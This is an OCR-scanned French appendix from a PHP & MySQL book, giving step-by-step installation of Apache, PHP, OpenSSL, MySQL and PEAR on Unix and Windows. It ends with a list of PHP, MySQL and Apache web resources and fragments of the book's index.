Nous pouvons alors veritablement nous attaquer a l'installation de PHP. Procedez a 
l'extraction des fichiers source, puis allez dans le repertoire d' installation : 

# cd /usr/src 

# gunzip -c php-5.2.6.tar.gz | tar xvf - 

# cd php-5.2.6 
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La encore, vous pouvez definir de nombreuses options avec la commande conf i 
gure de PHP. Pour determiner les options que vous voulez ajouter, faites configure 
help | less. Dans le cas present, nous voulons ajouter la prise en charge de MySQL, 
d' Apache, de PDFlib et de gd. 

Notez que les lignes qui suivent forment une seule et meme commande. Nous aurions 
pu la placer sur une seule et meme ligne mais, par souci de lisibilite, nous avons prefere 
ici utiliser le caractere de continuation, la barre oblique inversee (\), pour ecrire la 
commande sur plusieurs lignes : 

# ./configure --pref ix=/le/repertoire/de/php 

--with-mysqli=/le/repertoire/de/mysql_conf ig \ 
-- wit h - apxs2=/ us r/ local /apache2/ bin /apxs \ 
--with-j peg-dir=/ repertoire/ de/ j peglib \ 
--with-tif f -dir=/ repertoire /de/ tiff dir \ 
-- wit h - zlib- dir= / repertoire /de/zlib \ 
-- wit h-imap=/ repertoire /de/imapcclient \ 
--with-gd 

Nous pouvons ensuite creer et installer les binaires : 

# make 

# make install 

Copiez le fichier ini dans le repertoire lib : 

# cp php.ini-dist /usr/local/lib/php. ini 

OU 

# cp php.ini-recommended /usr/local/lib/php. ini 

Dans les commandes precedentes, les deux versions de php.ini suggerees contiennent 
des jeux d'options differents. Le premier, php.ini-dist, est destine a des ordinateurs de 
developpement. C'est ainsi, par exemple, que la directive display errors y est definie 
a On, ce qui est utile pour le developpement mais n'est guere souhaitable sur un ordina- 
teur en production. Lorsque nous faisons reference a la valeur par defaut des parametres 
de php.ini dans ce livre, c'est a cette version de php.ini que nous renvoyons. La seconde 
version, php. ini-recommended, est destinee aux ordinateurs en production. 

Vous pouvez modifier le fichier php.ini pour definir les options de PHP. Vous pouvez en 
definir un certain nombre, mais peu meritent de s'y attarder. Vous devrez, par exemple, 
definir la valeur de la directive sendmail path si vous voulez envoyer des e-mails avec 
des scripts. 

II faut maintenant installer OpenSSL, qui permettra de creer des certificats temporaires 
et des fichiers CSR. Loption prefix precise le repertoire principal d' installation : 

# gunzip -c openssl-0.9.8h.tar.gz [ tar xvf - 

# cd openssl-0.9.8h 

# ./config --pref ix=/usr/local/ssl 
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Ensuite, entrez les commandes suivantes pour lancer la compilation et 1' installation : 

# make 

# make test 

# make install 

Puis configurez la compilation d' Apache. L' option de compilation enable so active 
l'utilisation des objets partages dynamiques (DSO, pour Dynamic Shared Object) et 
l'utilisation du module mod ssl (bien qu'il soit fortement conseille d'utiliser les DSO 
pour disposer d'une souplesse maximale, Apache ne les supporte pas sur certaines 
plates-formes) : 

# cd . ./httpd-2.2.9 

# SSL_BASE=. . /openssl-0.9.8h \ 

./configure \ 

--pref ix=/usr/local/apache2 \ 

--enable-so 

--enable-ssl 

Enfm, vous pouvez compiler Apache et les certificats, puis les installer : 

# make 

Si tout s'est bien passe, vous devriez voir s'afficher un message semblable a celui-ci : 

+ + 

| Before you install the package you now should prepare the SSL | 
I certificate system by running the 'make certificate' command. 
I For different situations the following variants are provided: 

I % make certificate TYPE=dummy (dummy self-signed Snake Oil cert) j 

I % make certificate TYPE=test (test cert signed by Snake Oil CA) j 

j % make certificate TYPE=custom (custom cert signed by own CA) 

j % make certificate TYPE=existing (existing cert) 

I CRT=/path/to/your.crt [KEY=/path/to/your. key] 

j Use TYPE=dummy when you're a vendor package maintainer, 

j the TYPE=test when you're an admin but want to do tests only, 

j the TYPE=custom when you're an admin willing to run a real server | 

j and TYPE=existing when you're an admin who upgrades a server. | 

I (The default is TYPE=test) 



| Additionally add ALG0=RSA (default) or ALGO=DSA to select 
j the signature algorithm used for the generated certificate, 
j Use 'make certificate VIEW=1 1 to display the generated data, 
j Thanks for using Apache & mod_ssl. Ralf S. Engelschall 
j rse@engelschall.com - www.engelschall.com 

+ + 

Vous pouvez a present creer un certificat personnalise. Vous serez alors invite a 
entrer votre situation geographique, le nom de votre societe et diverses autres infor- 
mations. Pour les informations de contact, il est conseille d'indiquer des donnees 
correctes : 

# make certificate TYPE=custom 
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Ensuite, installez Apache : 
# make install 

Si 1' installation se deroule correctement, vous devriez obtenir un message du type : 

+ + 

| You now have successfully built and installed the 

j Apache 2.2 HTTP server. To verify that Apache actually j 

j works correctly you now should first check the 

j (initially created or preserved) configuration files 

/ usr/ local/ apache2/conf /httpd . conf | 

j and then you should be able to immediately fire up 
j Apache the first time by running: 

/usr/local/apache2/bin/apachectl start | 



I Thanks for using Apache. The Apache Group 

http://www.apache.org/ 

+ + 

A ce stade, il est temps de verifier qu' Apache et PHP fonctionnent correctement. Avant 
ce test, toutefois, nous devons modifier le fichier httpd. conf pour ajouter le type PHP a 
la configuration. 



Modification du fichier httpd. conf 

Lisez le fichier httpd.conf. Si vous avez suivi les precedentes instructions, il devrait se 
trouver dans le repertoire /usrAocal/apache2/conf. Dans ce fichier, les lignes addtype 
apparaissent en tant que commentaires ; vous devez done les decommenter afin que le 
fichier presente 1' aspect suivant : 

AddType application/x-httpd-php .php 
AddType application/x-httpd-php-source .phps 

Nous pouvons a present lancer le serveur Apache afin de tester son fonctionnement. 
Dans un premier temps, nous allons demarrer le serveur sans le support de SSL. Nous 
verifierons que PHP est correctement reconnu, puis nous arreterons le serveur et nous le 
relancerons, mais cette fois avec le support de SSL. 

Utilisez conf igtest pour verifier que la configuration est correcte : 

# cd /usr/local/apache2/bin 

# ./apachectl conf igtest 
Syntax OK 

# . /apachectl start 

./apachectl start: httpd started 

Si le serveur Apache est operationnel, la connexion au serveur au moyen d'un navigateur 
web devrait vous donner un affichage semblable a celui de la Figure A. 1 . 
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Figure A. 1 

La page de test 

par defaut fournie par 

le serveur Apache. 



File Ed rt View History Bookmarks Tools. Help 



It works! 



ASTUCE 

Vous pouvez vous connecter au serveur avec un nom de domaine ou en utilisant I'adresse IP de 
I'ordinateur. Testez ces deux possibilites pour vous assurer que tout fonctionne correctement. 



Test du fonctionnement de PHP 

Nous allons a present tester le support de PHP. Creez un nchier test.php contenant le 
code donne ci-apres. Ce nchier doit etre enregistre dans le dossier racine du serveur 
HTTP, qui devrait etre par defaut /usr/local/apache2/htdocs, bien que cet emplace- 
ment depende du prefixe choisi pour le repertoire d'installation. Ce parametrage peut 
etre change dans le nchier httpd.conf : 

<? phpinfo() ?> 

Le resultat obtenu a l'ecran devrait etre semblable a celui de la Figure A.2. 



Figure A.2 

La fonction phpinfo() 
fournit des informa- 
tions de configuration 
tres utiles. 
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Test du fonctionnement de SSL 

Avec Apache 2.2, vous devez activer SSL en decommentant la regie concernant http- 
ssl.conf dans httpd.conf . 

Au lieu de : 

# Include conf /extra/httpd-ssl. conf 
Vous devez done avoir : 

Include conf /extra/httpd-ssl. conf 

Vous pouvez effectuer de nombreuses modifications dans le fichier httpd-ssl.conf. 
Consultez la documentation d' Apache, disponible sur la page http://httpd.apache.org/ 
docs/2.2/mod/mod_ssl.html. 

Apres avoir effectue ces modifications de configuration, il suffit d'arreter le serveur, 
puis de le relancer: 

# /usr/local/apache2/bin/apachectl stop 

# /usr/local/apache2/bin/apachectl start 

Testez le fonctionnement de SSL en vous connectant au serveur avec un navigateur web 
et en selectionnant le protocole https de la maniere suivante : 

https : / / votreserveur . votredomaine . com 

Essayez egalement 1' adresse IP de votre serveur, comme suit : 

https: //xxx. xxx. xxx. xxx 

ou 

http : / /xxx . xxx . xxx . xxx : 443 

Si tout fonctionne bien, le serveur envoie le certificat au navigateur pour etablir une 
connexion securisee et ce dernier vous invitera alors a accepter le certificat autosigne. 
S'il s'agissait d'un certificat provenant d'une autorite de certification en laquelle votre 
navigateur a deja confiance, il ne vous demanderait pas votre accord mais, ici, nous 
avons cree et signe nos propres certificats. Avant d'acheter un certificat d'une autorite 
de certification, il est en effet necessaire de verifier que tout fonctionne correctement. 

Si vous utilisez Internet Explorer ou Firefox, un symbole de cadenas doit figurer dans la 
barre d'etat de votre navigateur, indiquant qu'une connexion securisee a ete etablie. La 
Figure A. 3 montre l'icone utilisee par Firefox ; il se trouve generalement dans le coin 
inferieur droit de la fenetre du navigateur. 



www.gaogle.com 

Figure A.3 

Les navigateurs web signalent par une icone speciale que la page visualisee a ete chargee via 
une connexion SSL. 
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Pour utiliser les modules PHP que vous avez installes comme des objets partages, vous 
devez encore realiser quelques etapes. 

Copiez d'abord le module que vous avez compile dans le repertoire des extensions de 
PHP II s'agira probablement de /usr/local/lib/php/extensions. 

Ajoutez la ligne suivante dans votre fichier php.ini : 

Extension = nom_extension .so 
Vous devrez ensuite relancer Apache. 

Installation d'Apache, de PHP et de MySQL sous Windows 

La procedure d' installation sous Windows est legerement differente de celle sous Unix, 
car PHP est installe soit en tant que script CGI (php.exe), soit en tant que module SAPI 
(php5apache2_2.dll). En revanche, Apache et MySQL s'installent de la meme maniere 
sous Windows et Unix. Assurez-vous d' avoir installe les derniers correctifs disponibles 
pour Windows avant de vous lancer dans cette procedure d'installation. 

Installation de MySQL sous Windows 

Les instructions suivantes ont ete ecrites pour une installation sous Windows Vista. 

Telechargez le fichier d'installation Windows Essentials *.msi a partir de http:// 
www.mysql.com, puis double-cliquez sur ce fichier pour lancer 1' installation. 

Les premiers ecrans du programme d'installation presentent des informations generales 
sur le processus d'installation et sur la licence de MySQL. Lisez-les, puis cliquez sur le 
bouton Continuer pour passer a la suite. Le premier choix important que vous aurez a 
faire concerne le type d'installation : type, compacte ou personnalisee. Comme l'instal- 
lation type convient a nos besoins, laissez ce choix par defaut et cliquez sur le bouton 
Suivant. 

Lorsque l'installation sera terminee, le guide de configuration de MySQL vous permet- 
tra de creer un fichier my.ini adapte a vos besoins. Pour cela, cochez la case Configurer 
MySQL Server et cliquez sur le bouton Terminer. 

Choisissez les options de configuration appropriees parmi celles qui sont presentees 
dans les differents ecrans du guide de configuration ; consultez le manuel en ligne 
sur http://dev.mysql.eom/doc/refman/5.0/en/index.html pour plus de details sur 
ces options. Lorsque la configuration est terminee (ce qui inclut l'ajout d'un mot de 
passe pour l'utilisateur root), le programme lancera le service MySQL. Lorsque le 
serveur a ete installe, vous pourrez utiliser le gestionnaire de services (qui se trouve 
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dans le panneau de configuration de Windows) pour 1' arreter, le demarrer ou faire en 
sorte qu'il soit lance automatiquement. Double-cliquez sur Outils d 'administration, 
puis sur Services. 

L'utilitaire Services est montre a la Figure A.4. Si vous voulez configurer des options de 
MySQL, vous devez d'abord arreter le service puis indiquer ces options en tant que 
parametres de demarrage dans l'utilitaire Services avant de redemarrer le service 
MySQL. Vous pouvez arreter le service MySQL avec l'utilitaire Services ou avec les 
commandes NET STOP MySQL ou mysqladmin shutdown. 
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Figure A.4 

L'utilitaire Services permet de configurer les services executes sur votre ordinateur. 



MySQL 

MySQL est livre avec plusieurs utilitaires en ligne de commande. Aucun d'entre eux ne 
sera simple a lancer tant que votre variable PATH n'inclut pas le repertoire qui contient 
le binaire de MySQL. Cette variable d'environnement est en effet destinee a indiquer a 
Windows les emplacements ou rechercher les executables des programmes. 

La majorite des commandes que vous utilisez sur la ligne de commande de Windows, 
comme dir et cd, sont des commandes internes, integrees a cmd.exe. D'autres, comme 
format et ipconf ig, disposent d'un executable qui leur est propre. Tout comme il ne 
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serait pas pratique de taper C: \WINNT\system32\f ormat a chaque fois que vous voulez 
formater un disque, il est preferable d'eviter d' avoir a taper C: \mysql\bin\mysql pour 
executer le moniteur MySQL. 

Le repertoire dans lequel resident les executables des commandes de base de Windows, 
comme format.exe, est automatiquement mentionne dans votre PATH ; c'est pourquoi 
vous pouvez vous contenter de taper format. Pour pouvoir faire la meme chose avec les 
outils en ligne de commande de MySQL, vous devez indiquer leur emplacement dans 
cette variable d'environnement. 

Cliquez sur Demarrer, choisissez Parametres, puis le Panneau de configuration. 
Double-cliquez sur Systeme et selectionnez l'onglet Avance. Si vous cliquez sur le 
bouton Variables d'environnement, il apparaitra une boite de dialogue qui vous permet- 
tra d'afficher les variables d'environnement de votre systeme. Double-cliquez sur PATH 
pour modifier le contenu de celle-ci. 

Ajoutez un point-virgule a la fin de la ligne de votre PATH actuel ann de separer 
la nouvelle entree de la precedente, puis ajoutez c:\mysql\bin. Lorsque vous 
cliquerez sur OK, votre ajout sera enregistre dans la base de registres du systeme et, 
au prochain redemarrage de l'ordinateur, vous pourrez entrer mysql au lieu de 
C: \mysql\bin\mysql. 

Installation d'Apache sous Windows 

Apache 2.2 s'execute sur la plupart des versions de Windows et offre des performances 
amehorees et une stabilite accrue par rapport a Apache 2.0 et Apache 1.3 pour 
Windows. Vous pourriez 1' installer a partir de ses fichiers sources mais, comme peu de 
systemes Windows disposent des outils necessaries a la compilation, nous presenterons 
ici son installation a partir d'un installateur .msi. 

Nous avons done telecharge le fichier apache_2.2.9-win32-x86-openssl-0.9.8h-r2.msi, 
qui contient la version courante dans la branche 2.2 pour Windows, plus OpenSSL 
0.9. 8h. Ce fichier ne contient pas les sources mais est empaquete sous forme de fichier 
MSI, le format utilise par 1' installateur de Windows. 

Sauf si vous avez affaire a un bogue particulierement mysterieux ou que vous souhai- 
tiez participer a l'effort de developpement, il est peu probable que vous souhaitiez 
compiler vous-meme le code source. Ce fichier contient done le serveur Apache pret 
pour 1' installation. 

Double-cliquez sur le fichier telecharge pour lancer la procedure d' installation. Celle-ci 
devrait vous etre familiere puisqu'elle ressemble a toutes celles qui utilisent l'installeur 
Windows (voir Figure A.5). 
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Figure A.5 

L'installateur Apache 
est simple d'emploi. 




Le programme d' installation vous demandera de renseigner les points suivants : 

■ Le nom du reseau, le nom du serveur et l'adresse e-mail de l'administrateur. Si vous 
installez un serveur pour un environnement de production, il est preferable de 
repondre a ces questions. Si le serveur est destine a votre usage personnel, celles-ci 
ne sont pas tres importantes. 

■ Si vous voulez executer Apache en tant que service. Comme pour MySQL, il est 
generalement preferable de le configurer de cette maniere. 

■ Le type d'installation. Nous recommandons 1' installation complete mais vous 
pouvez choisir 1' installation personnalisee si vous souhaitez ne pas installer certains 
composants, comme la documentation. 

■ Le repertoire dans lequel installer Apache. (Le repertoire par defaut est C:\Progmm 
Files\Apache Software Foundatioii\Apache2.2.) 

Lorsque tous ces renseignements auront ete fournis, le serveur Apache sera installe et 
demarre. 

Apache ecoutera sur le port 80 (sauf si vous avez modifie les directives Port, Listen ou 
BindAd dress dans les fichiers de configuration) apres son demarrage. Pour vous 
connecter au serveur et acceder a la page par defaut, lancez un navigateur web et entrez 
l'URL suivante : 

http : 1 1 localhost I 

Vous devriez alors voir une page de bienvenue semblable a celle montree a la Figure A. 1 . 
Si rien ne se passe, ou si vous obtenez un message d'erreur, examinez le contenu du 
fichier error.log dans le repertoire logs. Si votre hote n'est pas connecte a Internet, peut- 
etre devrez-vous utiliser l'URL suivante : 

http://127. 0.0.1/ 
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Cette adresse IP est celle qui correspond a l'hote local, localhost. 

Si vous avez modifie le numero de port par defaut (80), vous devez ajou- 
ter :numero port a la fin de l'URL, mais n'oubliez pas qu'Apache ne peut pas partager 
le meme port avec une autre application TCP/IP. 

Vous pouvez lancer et arreter le service Apache a partir du menu Demarrer : Apache s'y 
ajoute lui-meme sous 1' intitule 'Apache HTTP Server" dans le sous-menu Program- 
mes. Dans le panneau intitule "Controle du serveur Apache", vous trouverez les options 
permettant de demarrer, d' arreter ou de redemarrer le serveur. 

Apres avoir installe Apache, il peut etre necessaire d'editer les fichiers de configuration 
conserves dans le repertoire conf. Nous aborderons la modification du fichier de confi- 
guration httpd.conf lor s de 1' installation de PHP. 

Installation de PHP sous Windows 

Pour installer PHP pour Windows, commencez par telecharger les fichiers pour PHP 
depuis http://www.php.net. 

Pour installer PHP sous Windows, vous avez besoin de deux fichiers. L'un est le fichier 
ZIP contenant PHP (portant un nom comme php-5. 2.6-Win32.zip) et 1' autre est une 
collection de bibliotheques (et porte un nom du type pecl-5. 2.6-Win32.zip). 

Commencez par decompresser le fichier ZIP vers le repertoire de votre choix. L' empla- 
cement habituel est c:\PHP et c'est celui que nous utiliserons ici. 

Vous pouvez installer les bibliotheques PECL en decompressant le fichier PECL vers 
votre repertoire d'extensions. Si C:\PHP est le repertoire de base, il s'agira de 
C:\PHP\ext\ 

Suivez ensuite ces etapes : 

1. Dans le repertoire principal, vous trouverez un fichier appele php.exe et un autre 
appele php5ts.dll. II s'agit des deux fichiers dont vous avez besoin pour executer 
PHP dans sa version CGI. Si vous souhaitez l'executer en tant que module SAPI, 
vous pouvez utiliser le php5apache2_2.dll. 

Les modules SAPI s'executent plus rapidement et sont mieux securises ; la version 
CGI vous permet d'executer PHP a partir de la ligne de commande. La encore, c'est 
a vous de decider. 

2. Installez un fichier de configuration php.ini. PHP est fourni avec deux fichiers 
prede finis : php.ini-dist et php.ini-recommended. Nous vous conseillons de choisir 
le premier pendant que vous apprenez PHP ou sur les serveurs de developpement et 
php.ini-recommended sur les serveurs en production. Faites une copie de ce fichier 
que vous renommerez php. ini. 
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4. Modifiez ce fichier php. ini. Celui-ci contient de nombreux parametres que vous 
pouvez ignorer pour 1' instant. Ceux qui nous interessent dans l'immediat sont les 
suivants : 

- Modifiez la directive extension dir pour qu'elle pointe vers 1' emplacement oil 
resident les DLL de vos extensions. Dans le cadre d'une installation standard, il 
s'agit de C:\PHP\ext. Votre php. ini devra done contenir la ligne suivante : 

extension_dir = c:/php/ext 

- Definissez la directive doc root pour qu'elle pointe vers le repertoire racine des 
documents mis a disposition par votre serveur web. Le plus souvent, avec Apache, il 
s'agira de : 

doc_root = "c: /Program Files/Apache Software Foundation/Apache2.2/htdocs" 

- Vous pouvez egalement selectionner des extensions a executer. Nous vous 
conseillons pour le moment de vous contenter de PHP puis d'ajouter des extensions 
a mesure de vos besoins. Pour ajouter des extensions, reportez-vous a la liste qui suit 
"Windows Extensions". Vous y verrez de nombreuses lignes comme celle-ci : 

; extension=php_pdf . dll 

Pour activer cette extension, il suffit de supprimer le point-virgule en debut de 
ligne (et de 1' ajouter pour la desactiver). Si vous voulez ajouter d'autres exten- 
sions par la suite, vous devrez redemarrer votre serveur web apres avoir modifie 
votre fichier ini afin que ces modifications entrent en vigueur. 

- Dans ce livre, nous avons besoin de php _pdf.dll, php_gd2.dll, php_imap.dll et 
php_mysqli.dll. Vous devrez done decommenter ces lignes. Si la ligne concernant 
php_mysqli.dll n'est pas presente, ajoutez-la : 

extension=php_mysqli.dll. 

- Fermez et sauvegardez votre fichier php. ini. 

5. Si vous utilisez NTFS, assurez-vous que l'utilisateur sous le compte duquel 
s' execute le serveur web dispose des permissions adequates pour lire votre fichier 
php. ini. 

Ajout de PHP a la configuration d 'Apache 

Vous aurez certainement besoin d'editer les fichiers de configuration d' Apache. Ouvrez 
le fichier httpd.conf dans votre editeur de texte favori. Ce fichier est generalement situe 
dans le repertoire c:\Program FilesWpache Software Foundation\Apache2.2\conf\. 
Recherchez les lignes suivantes : 

LoadModule php5_module C: /php5/php5apache2_2.dll 

PHPIniDir "C:/php5/" 

AddType application/x-httpd-php .php 

Si ces lignes n'existent pas, ajoutez-les a la fin du fichier, enregistrez ce dernier et rede- 
marrez votre serveur Apache. 
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Test de Vinstallation PHP 

Demarrez le serveur web et testez le bon fonctionnement de PHP. Creez un fichier 
test.php et inserez-y la ligne suivante : 

<? phpinfo() ?> 

Placez ce fichier dans le repertoire racine des documents du serveur (generalement 
c:\Program FileSApache Software Foundation\Apache2.2\htdocs), puis chargez-le dans 
votre navigateur en demandant l'URL suivante : 

http: //localhost/ test.php 

ou 

http: //votre_adresse_ip/test .php 

Si vous obtenez l'affichage d'une page semblable a celle de la Figure A.2, c'est que 
PHP fonctionne. 

Installation de PEAR 

PHP 5 est accompagne de l'installeur de paquetages PEAR (PHP Extension and Appli- 
cation Repository). Si vous utilisez Windows, ouvrez une fenetre de commande et 
tapez : 

c: \php\go-pear 

Le script go pear vous posera quelques questions simples concernant l'emplacement 
de l'installeur de paquetages et les classes PEAR standard, puis il les telechargera et les 
installera pour vous (la premiere etape n'est pas necessaire avec Linux, mais le reste de 
1' installation est identique). 

A partir de la, l'installeur de paquetages PEAR devrait etre installe, ainsi que les biblio- 
theques PEAR de base. II vous suffit alors de taper : 

pear install paquetage 
ou paquetage est le nom du paquetage que vous souhaitez installer. 
Pour obtenir une liste des paquetages disponibles, faites : 

pear list-all 
Pour afficher les paquetages deja installes, faites : 

pear list 

Pour installer le paquetage Mail Mime utilise dans le Chapitre 28, tapez : 

pear install Mail_Mime 
Le paquetage MDB2 mentionne au Chapitre 1 1 doit etre installe de la meme facon : 

pear install MDB2 
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Pour mettre a jour un paquetage que vous avez deja installe, faites : 

pear upgrade paquetage 

Si cette procedure ne fonctionne pas, nous vous conseillons d'essayer de telecharger 
directement les paquetages PEAR a partir de http://pear.php.net/packages.php. 

Une fois sur le site, consultez la liste des paquetages disponibles. Par exemple, nous 
avons utilise dans ce livre le paquetage Mail_Mime. Parcourez le site ann de vous 
rendre a la page correspondant a ce paquetage, puis cliquez sur le lien Download Latest 
pour en obtenir une copie. II faudra ensuite dezipper le fichier telecharge et le placer 
dans un repertoire correspondant a votre variable include path. 

II est preferable d'avoir un repertoire c: \php\pear ou une structure analogue. Si vous 
telechargez manuellement des paquetages, nous vous conseillons de les placer dans 
l'arborescence de repertoires de PEAR. PEAR utilisant une structure de repertoires 
standard, nous vous suggerons d'enregistrer vos telechargements a remplacement stan- 
dard, c'est-a-dire la ou l'installeur les aurait mis. Par exemple, le paquetage Mail_Mime 
appartient a la section Mail ; en consequence, il faut placer celui-ci dans le repertoire 
c:\php\jeat\Mail. 

Autres configurations 

Vous pouvez configurer PHP et MySQL avec d' autres serveurs web comme Omni, 
HTTPD et Netscape Enterprise Server. Nous ne traiterons pas ces configurations dans 
cette annexe, mais vous pourrez trouver toutes les informations necessaries sur les sites 
dedies a MySQL et PHP, http://www.mysql.com et http://www.php.net. 
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Cette annexe presente quelques-unes des nombreuses ressources disponibles sur le 
Web, dont vous pourrez tirer profit pour trouver des cours, des articles, des informations 
recentes et des exemples de code PHP. Naturellement, ces ressources sont si nombreu- 
ses qu'il n'est pas possible de toutes les citer dans cette annexe, et il y en a tous les jours 
un peu plus, puisque la popularite de PHP et de MySQL ne cesse de croitre dans le 
monde des developpeurs web. 

Ces ressources sont parfois en anglais, en francais ou en allemand, ou encore dans 
d'autres langues. Nous vous suggerons d'utiliser un traducteur comme http:// 
www.systransoft.com pour parcourir le Web en traduisant automatiquement les pages 
dans votre langue preferee. 



Ressources PHP 

■ PHP.net (http://www.php.net), le site original de PHP. Sur ce site, vous pourrez 
telecharger les versions binaires et les sources de PHP ainsi que le manuel. Vous 
pouvez egalement parcourir les archives des listes de discussion et vous tenir 
informe des nouveautes concernant PHP. 

ZEND.com (http://www.zend.com), la source du moteur ZEND qui fournit toute la 
puissance de PHP. Ce site contient des forums, des articles, des didacticiels ainsi 
qu'une base de donnees de classes et de code que vous pouvez utiliser. 

■ PEAR (http://pear.php.net). Site officiel des extensions PHP. 

■ PECL (http://pecl.php.net). Site frere de PEAR. PEAR contient les classes ecrites 
en PHP alors que PECL contient les extensions ecrites en C. Les classes PECL sont 
quelquefois plus difficiles a installer mais elles proposent une gamme de fonction- 
nalites plus vaste et sont presque toujours plus puissantes que leurs equivalents PHP. 
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■ PHPCommunity (http://www.phpcommunity.org/). Nouveau site communautaire 
consacre a PHP. 

■ php|architect (http://www.phparch.com). Magazine PHP. Ce site propose des arti- 
cles gratuits et vous permet de vous abonner afin de recevoir le magazine au format 
PDF ou imprime. 

B PHP Magazine (http://www.phpmag.net/). Autre magazine PHP, egalement dispo- 
nible au format electronique ou papier. 

■ PHPMyAdmin.Net (http://www.phpmyadmin.net/). Site de l'interface web bien 
connue pour MySQL. 

■ PHPBuilder.com (http://www.phpbuilder.com). Portail de didacticiels sur PHP. 
Sur ce site, vous trouverez des didacticiels sur tous les sujets imaginables. II 
propose egalement un forum dans lequel les utilisateurs de PHP peuvent poser des 
questions. 

■ DevShed.com (http://www.devshed.com). Portail proposant d'excellents didac- 
ticiels sur PHP, MySQL, Perl et d'autres langages de developpement. 

■ PX-PHP Code Exchange (http://px.sklar.com). Site tres interessant pour les debu- 
tants. Vous y trouverez plusieurs exemples de scripts et de fonctions utiles. 

■ The PHP Resource (http://www.php-resource.de). Source tres riche de didacti- 
ciels, d'articles et de scripts. Le seul "probleme" de ce site est qu'il est en allemand. 
Nous vous recommandons done de passer par un service de traduction si vous ne 
parlez pas tres bien cette langue. Vous pouvez dans tous les cas consulter les exemples 
de code. 

■ WeberDev.com (http://www.WeberDev.com), auparavant connu sous le nom de 
Berber's PHP sample page, s'est developpe et contient desormais plusieurs didacti- 
ciels et exemples de code. II est destine aux utilisateurs de PHP et de MySQL et 
aborde des sujets aussi varies que la securite et les bases de donnees. 

■ HotScripts.com (http://www.hotscripts.com), un bon ensemble de scripts classes 
par categories. Ce site regroupe des scripts pour differents langages, comme PHP, 
ASP et Perl. La partie consacree aux scripts PHP est tres complete. De plus, ce site 
est tres souvent mis a jour. Un site incontournable si vous cherchez des scripts. 

■ PHP Base Library (http://phplib.sourceforge.net). Site utilise par les developpeurs 
pour les projets PHP de grande envergure. Vous y trouverez une bibliotheque 
complete d'outils pour une approche alternative dans le domaine de la gestion des 
sessions ainsi pour les modeles et les abstractions de bases de donnees. 

■ PHP Center (http://www.php-center.de). Un autre portail allemand qui contient 
des didacticiels, des scripts, des conseils, des annonces, etc. 
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■ PHP Homepage (http://www.php-homepage.de). Encore un autre site allemand 
sur PHP qui contient des scripts, des articles, des informations et bien d'autres 
choses. II inclut egalement une section de reference rapide. 

■ PHPIndex.com (http://www.phpindex.com). Portail francais proposant beaucoup 
d' informations sur PHP, comme les dernieres nouvelles, des FAQ, des articles, des 
offres d'emploi et bien d'autres choses. 

■ WebMonkey.com (http://www.webmonkey.com). Portail regroupant plusieurs 
ressources web, des cours pratiques, des exemples de code, etc. Ce site aborde les 
problemes de conception, de programmation, de back-ends, d'elements multimedias, 
pour n'en citer que quelques-uns. 

■ The PHP Club (http://www.phpclub.net). Site qui propose plusieurs ressources 
pour les debutants en PHP. II contient des nouvelles, des resumes de livres, des 
exemples de code, des forums, des FAQ et beaucoup d'autres didacticiels pour les 
debutants. 

■ PHP Classes Repository (http://phpclasses.org). Site consacre a la distribution de 
classes gratuites ecrites en PHP. II est indispensable si vous developpez du code ou 
si votre projet repose sur des classes. Ce site possede aussi une fonction de recherche 
tres pratique pour trouver facilement les informations qui vous interessent. 

■ The PHP Resource Index (http://php.resourceindex.com). Site portail qui contient 
des scripts, des classes et de la documentation. Toutes les informations de ce site 
sont tres bien organisees, ce qui peut vous faire gagner un temps precieux. 

■ PHP Developer (http://www.phpdeveloper.org). Autre portail PHP qui contient 
des nouvelles, des articles et des didacticiels. 

■ Evil Walrus (http://www.evilwalrus.com). Portail interessant de scripts PHP. 

■ Source Forge (http:// sourceforge.net). Site tres complet pour les ressources open- 
source. Source Forge permet non seulement de ttouver le code qui vous interesse, 
mais fournit egalement un acces CVS, des listes de diffusion et des machines pour 
les developpeurs open-source. 

■ Codewalkers (http://codewalkers.com/) contient des articles, des comptes rendus 
de lecture, des didacticiels et l'amusant concours PHP Contest, ou vous pouvez 
gagner des prix en exercant vos nouveaux talents. Ce site organise un concours 
toutes les deux semaines. 

■ PHP Kitchen (http://www.phpkitchen.com/) presente des articles, des informations 
et une profession de foi en faveur de PHP. 

■ Postnuke (http://www.postnuke.com/). Systeme de gestion de contenu avec PHP 
tres utilise. 
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■ PHP Application Tools (http://www.php-tools.de/). Ensemble de classes PHP tres 
utiles. 

■ Codango (www.codango.com/php/). Ressource interessante pour les applications 
web en PHP. Ce site propose des bibliotheques, des scripts, des hebergements, des 
didacticiels et beaucoup d'autres choses encore. 

Ressources MySQL et SQL 

I Le site officiel de MySQL (http://www.mysql.com). Contient une excellente docu- 
mentation, le support et les informations necessaries. Un site incontournable si vous 
vous servez de MySQL, notamment pour sa zone developpeur et ses archives de 
listes de discussion. 

■ The SQL Course (http://sqlcourse.com). Site pour les debutants en SQL, qui propose 
un cours d' introduction a SQL accompagne d' instructions simples a comprendre. 
II permet de mettre en pratique ce que vous avez appris en mettant a disposition un 
interpreteur SQL en ligne. 

■ SearchDatabase.com (http://searchdatabase.techtarget.com). Portail interessant 
qui inclut beaucoup d' informations utiles sur les systemes de bases de donnees. 
Vous y trouverez d'excellents cours, des astuces, des publications, des FAQ, des 
presentations, etc. Incontournable ! 

Ressources Apache 

■ Apache Software (http://www.apache.org). Le point de depart si vous devez char- 
ger des sources ou des executables pour le serveur web Apache. Vous y trouverez 
egalement la documentation en ligne. 

■ Apache Week (http://www.apacheweek.com). Site de nouvelles hebdomadaires 
qui fournit les informations essentielles pour tous ceux qui se servent du serveur 
Apache ou d'autres services Apache. 

■ Apache Today (http://www.apachetoday.com). Source d' informations quotidiennes 
sur Apache. Les utilisateurs doivent s'inscrire pour pouvoir poster des questions. 

Developpement web 

Philip and Alex's Guide to Web Publishing (http://philip.greenspun.com/panda/), un 
guide pratique et irreverencieux pour le developpement de logiciels applique au Web. 
L'un des rares livres sur le sujet cosigne par un Samoyede. 
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d'un e-mail (afficher) 680 

Entites HTML 354 
Environnement 
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des en-tetes 805 

EOF 80 

ereg() (fonction) 141 
ereg_replace() (fonction) 141 
eregi() (fonction) 141 
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rmdir() 431 

rsort() 100 

scandir() 430 

serialize() 521 

session_set_cookies_params() 505 
session_start() 506, 509 
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strip_tags() 404, 425 

StripSlashes() 123, 286, 404 

strlen() 129 

strnatcmpO 128 

strpos() 131 
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ouverture de session 573, 704 
reinitialisation des mots de passe 589 
traitement avec PHP 1 8 
variables (de) 24 



924 PHP & MySQL 



Forums web 739-769 
articles 

affichage 752, 759 

ajout 761 

arborescence 746 
base de donnees 743 
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exemple d'utilisation 44 
incrementation 38 
